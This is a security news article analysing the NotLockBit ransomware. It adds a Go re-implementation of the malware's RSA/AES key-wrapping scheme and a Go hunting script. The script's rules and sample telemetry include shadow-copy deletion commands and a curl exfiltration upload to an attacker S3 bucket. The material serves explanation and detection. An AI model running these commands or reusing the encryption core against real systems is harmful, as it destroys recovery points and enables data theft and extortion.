Cyber Security News

NotLockBit – Previously Unknown Ransomware Attacks Windows & macOS

A new and advanced ransomware family, dubbed NotLockBit, has emerged as a significant threat in the cybersecurity landscape, closely mimicking the behavior and tactics of the notorious LockBit ransomware.

NotLockBit notably distinguishes itself by being one of the first ransomware strains designed to effectively attack both macOS and Windows operating systems, showcasing powerful cross-platform capabilities.

Overview of NotLockBit’s Capabilities

Distributed as an x86_64 binary written in the Go programming language, NotLockBit exhibits a sophisticated design, equipped with advanced features such as:

  • Targeted File Encryption: Encrypts valuable or sensitive data with a hybrid scheme that combines the AES and RSA algorithms.
  • Data Exfiltration: Transfers stolen files to attacker-controlled storage, often Amazon S3 buckets, to set up double extortion.
  • Self-Deletion Mechanisms: Removes traces of its presence, including shadow copies, to hinder recovery.

“Our analysis reveals that this new strain demonstrates advanced capabilities, including targeted file encryption, data exfiltration, and self-deletion mechanisms.” CSN learned from detailed Qualys research.


Technical Insights Into NotLockBit’s Functionality

Upon execution, NotLockBit begins with a reconnaissance phase, particularly on macOS systems.

[Figure: NotLockBit execution chain]

It uses the go-sysinfo module to collect detailed system information, such as hardware specifications, operating system details, network configuration, and unique identifiers (UUIDs).

The ransomware uses a three-step hybrid encryption scheme that pairs RSA with AES:

  1. Decodes an embedded RSA public key from PEM-encoded data.
  2. Generates a random master encryption key and encrypts it with that RSA public key, so only the holder of the matching private key can recover it.
  3. Encrypts user files under the master key while skipping system directories such as /proc/, /sys/, and /dev/. (Of these, only /dev/ exists on macOS; /proc/ and /sys/ are Linux paths.)

Encrypted files are written back to their original location, renamed with a unique identifier and given an .abcd extension, and the originals are deleted. Because the master key is stored only in RSA-encrypted form, decryption without the attacker's private key is effectively impossible.
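The three-step scheme above, written out as an added example in Go (the language the article says NotLockBit is built in). This is illustrative code written for this page, not Qualys's analysis tooling or the malware's own code. The article does not state the PEM encoding, the RSA padding or the AES mode, so PKIX PEM, RSA-OAEP with SHA-256 and AES-256-GCM are assumptions here; the decryptor side is included to show that recovery hinges entirely on the operator's private key, and the skip-list check mirrors the directory exclusions reported for step 3.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"crypto/x509"
	"encoding/pem"
	"errors"
	"fmt"
	"strings"
)

// Exclusion list reported for NotLockBit. /proc and /sys are Linux-only; on macOS only /dev exists.
var skipDirs = []string{"/proc/", "/sys/", "/dev/"}

// ShouldSkip reports whether a path sits under an excluded system directory.
func ShouldSkip(path string) bool {
	for _, d := range skipDirs {
		if strings.HasPrefix(path, d) {
			return true
		}
	}
	return false
}

// ParsePublicKey (step 1) decodes the PEM-encoded RSA public key embedded in the binary.
func ParsePublicKey(pemBytes []byte) (*rsa.PublicKey, error) {
	block, _ := pem.Decode(pemBytes)
	if block == nil || block.Type != "PUBLIC KEY" {
		return nil, errors.New("no PUBLIC KEY block in PEM data")
	}
	key, err := x509.ParsePKIXPublicKey(block.Bytes)
	if err != nil {
		return nil, err
	}
	if pub, ok := key.(*rsa.PublicKey); ok {
		return pub, nil
	}
	return nil, errors.New("PEM block does not hold an RSA key")
}

// NewMasterKey (step 2) draws the random 256-bit AES key that will encrypt every file.
func NewMasterKey() ([]byte, error) {
	key := make([]byte, 32)
	_, err := rand.Read(key)
	return key, err
}

// WrapMasterKey (step 2) seals the master key under the operator's public key with RSA-OAEP.
// Without the matching private key the master key, and so every file, is unrecoverable.
func WrapMasterKey(pub *rsa.PublicKey, master []byte) ([]byte, error) {
	return rsa.EncryptOAEP(sha256.New(), rand.Reader, pub, master, nil)
}

// UnwrapMasterKey is the decryptor side that only the private-key holder can run.
func UnwrapMasterKey(priv *rsa.PrivateKey, wrapped []byte) ([]byte, error) {
	return rsa.DecryptOAEP(sha256.New(), rand.Reader, priv, wrapped, nil)
}

// Envelope is what replaces a file on disk: nonce plus AES-GCM ciphertext (GCM is assumed).
type Envelope struct {
	Nonce, Ciphertext []byte
}

func aesGCM(master []byte) (cipher.AEAD, error) {
	blk, err := aes.NewCipher(master)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(blk)
}

// EncryptWithMaster (step 3) encrypts one file's contents under the master key.
func EncryptWithMaster(master, plaintext []byte) (*Envelope, error) {
	gcm, err := aesGCM(master)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	return &Envelope{Nonce: nonce, Ciphertext: gcm.Seal(nil, nonce, plaintext, nil)}, nil
}

// DecryptWithMaster reverses EncryptWithMaster once the master key has been unwrapped.
func DecryptWithMaster(master []byte, env *Envelope) ([]byte, error) {
	gcm, err := aesGCM(master)
	if err != nil {
		return nil, err
	}
	return gcm.Open(nil, env.Nonce, env.Ciphertext, nil)
}

// GenerateDemoKeyPEM stands in for the operator's key pair so the round trip runs offline;
// a real sample embeds only the public half.
func GenerateDemoKeyPEM() (*rsa.PrivateKey, []byte, error) {
	priv, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		return nil, nil, err
	}
	der, err := x509.MarshalPKIXPublicKey(&priv.PublicKey)
	if err != nil {
		return nil, nil, err
	}
	return priv, pem.EncodeToMemory(&pem.Block{Type: "PUBLIC KEY", Bytes: der}), nil
}

func main() {
	priv, pubPEM, _ := GenerateDemoKeyPEM()
	pub, _ := ParsePublicKey(pubPEM)
	master, _ := NewMasterKey()
	wrapped, _ := WrapMasterKey(pub, master)
	env, _ := EncryptWithMaster(master, []byte("constructed sample document"))
	recovered, _ := UnwrapMasterKey(priv, wrapped)
	plain, _ := DecryptWithMaster(recovered, env)
	fmt.Printf("wrapped key: %d bytes, recovered: %q\n", len(wrapped), plain)
}
```

The point for responders is the asymmetry: every artefact left on the victim (the .abcd files and the wrapped key) is useless without the private key that never leaves the operator, so incident response should focus on backups and on catching the pre-encryption stages rather than on cryptanalysis.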

NotLockBit focuses on a variety of file types, including but not limited to:

  • Personal documents: .doc, .pdf, .txt
  • Professional files: .csv, .xls, .ppt
  • Multimedia: .jpg, .png, .mpg
  • Virtual machine data: .vmdk, .vmsd, .vbox

The comprehensive targeting emphasizes the ransomware’s attempt to extract maximum value from user systems.

Going beyond encryption, NotLockBit exfiltrates sensitive files to attacker-controlled storage, typically an Amazon S3 bucket.

This step paves the way for a double-extortion strategy, in which the attackers threaten to publish or sell the stolen data unless the ransom is paid.

Once encryption is complete, NotLockBit alters the victim’s desktop wallpaper, replacing it with a ransom note.

On macOS devices, this is achieved using the osascript command, which programmatically interacts with the operating system to change the background image.

The ransomware concludes its attack by deleting its own binary and traces of its execution from the victim's system. On Windows this also includes deleting Volume Shadow Copies, which removes the built-in restore points a victim might otherwise roll back to.

NotLockBit samples vary in how much effort has gone into hindering analysis:

  • Some samples retain visible function names.
  • Others are obfuscated or fully stripped of symbols, which makes reverse engineering and threat analysis considerably harder.

Interestingly, researchers observed variants omitting data exfiltration capabilities, focusing solely on encryption. This suggests tailored attack strategies or ongoing development of the ransomware.

Detection and Mitigation

The Qualys EDR & EPP security solutions can detect and quarantine NotLockBit as soon as it is downloaded.

Security professionals are encouraged to run threat-hunting queries against endpoint telemetry to find and contain the ransomware's activity. Beyond that, organizations should implement robust cybersecurity measures, including:

  1. Regular Backups: Maintain offline backups of critical data.
  2. Endpoint Protection: Use advanced detection solutions capable of identifying ransomware behavior.
  3. Network Security: Employ firewalls, intrusion detection systems, and access controls.
  4. User Awareness: Educate employees about phishing, social engineering, and other cybercriminal tactics.
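The hunting logic the previous section calls for, as an added example in Go that is not part of the article or of any Qualys query. It runs four behavioural rules drawn from the article over constructed telemetry: the osascript wallpaper change on macOS, shadow-copy deletion on Windows, command-line uploads to Amazon S3, and a burst of renames to the .abcd extension. The article names none of the exact command lines, so the AppleScript wording, the vssadmin/wmic forms and the rename threshold of five are assumptions, and the Event record is a made-up schema rather than any EDR's.

```go
package main

import (
	"fmt"
	"regexp"
	"sort"
	"strings"
)

// Event is one constructed endpoint telemetry record; it is not a real EDR schema.
type Event struct {
	Host   string
	Kind   string // "process" carries a command line, "rename" carries "old -> new"
	Detail string
}

// Finding is one matched hunting rule on one host.
type Finding struct {
	Host, Rule string
}

// Number of .abcd renames on a single host before we call it mass encryption (assumed).
const renameThreshold = 5

var processRules = []struct {
	name string
	re   *regexp.Regexp
}{
	// The article says the wallpaper is swapped with osascript; the AppleScript wording is assumed.
	{"macos_wallpaper_osascript", regexp.MustCompile(`(?i)osascript.*desktop picture`)},
	// The article only says shadow copies are deleted; these Windows commands are the usual means, assumed here.
	{"shadow_copy_deletion", regexp.MustCompile(`(?i)(vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete)`)},
	// Exfiltration to Amazon S3 from a command-line tool rather than a browser.
	{"s3_upload_from_cli", regexp.MustCompile(`(?i)s3[.-][a-z0-9.-]*amazonaws\.com|\baws\s+s3\s+cp\b`)},
}

// The article reports that encrypted files are renamed with an .abcd extension.
var abcdRename = regexp.MustCompile(`->\s*\S+\.abcd$`)

// Hunt applies the rules and returns findings sorted by host then rule.
func Hunt(events []Event) []Finding {
	var out []Finding
	renames := map[string]int{}
	for _, ev := range events {
		switch ev.Kind {
		case "process":
			for _, r := range processRules {
				if r.re.MatchString(ev.Detail) {
					out = append(out, Finding{ev.Host, r.name})
				}
			}
		case "rename":
			if abcdRename.MatchString(strings.TrimSpace(ev.Detail)) {
				renames[ev.Host]++
			}
		}
	}
	for host, n := range renames {
		if n >= renameThreshold {
			out = append(out, Finding{host, "mass_abcd_rename"})
		}
	}
	sort.Slice(out, func(i, j int) bool {
		if out[i].Host != out[j].Host {
			return out[i].Host < out[j].Host
		}
		return out[i].Rule < out[j].Rule
	})
	return out
}

// SampleEvents is constructed telemetry: one infected Mac, one infected Windows host, two clean hosts.
func SampleEvents() []Event {
	ev := []Event{
		{"mac01", "process", `/usr/bin/osascript -e 'tell application "Finder" to set desktop picture to POSIX file "/tmp/note.png"'`},
		{"mac02", "process", `/usr/bin/osascript -e 'display notification "build finished"'`},
		{"win01", "process", `vssadmin.exe delete shadows /all /quiet`},
		{"win01", "process", `curl.exe -T C:\Users\alice\Documents\q1.xls https://loot-bucket.s3.us-east-1.amazonaws.com/q1.xls`},
		{"win02", "process", `notepad.exe C:\Users\bob\notes.txt`},
		// A single rename stays below the threshold and is not reported on its own.
		{"mac01", "rename", `/Users/alice/Documents/cv.pdf -> /Users/alice/Documents/3f9c1a.abcd`},
	}
	for i := 1; i <= renameThreshold; i++ {
		ev = append(ev, Event{"win01", "rename",
			fmt.Sprintf(`C:\Users\alice\Documents\report%d.doc -> C:\Users\alice\Documents\%06x.abcd`, i, i*7919)})
	}
	return ev
}

func main() {
	for _, f := range Hunt(SampleEvents()) {
		fmt.Printf("%s\t%s\n", f.Host, f.Rule)
	}
}
```

Two of the rules (wallpaper and shadow-copy deletion) fire after encryption has already started, so they confirm an incident rather than prevent one; the S3 and rename rules are the ones worth wiring to an automatic host isolation, and the rename threshold should be tuned against how many legitimate renames your fleet produces in the same window.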

The emergence of NotLockBit, particularly its dual compatibility with macOS and Windows systems, signals a worrying trend in ransomware development.

Its ability to mimic established ransomware families, such as LockBit, and its use of exfiltration tactics emphasize the increasing complexity of cyber threats.

This ransomware family demands close monitoring by security researchers and robust defenses by organizations to thwart its potentially devastating consequences.

As always, vigilance and preparedness remain critical in combating the evolving ransomware landscape.


Balaji

BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.
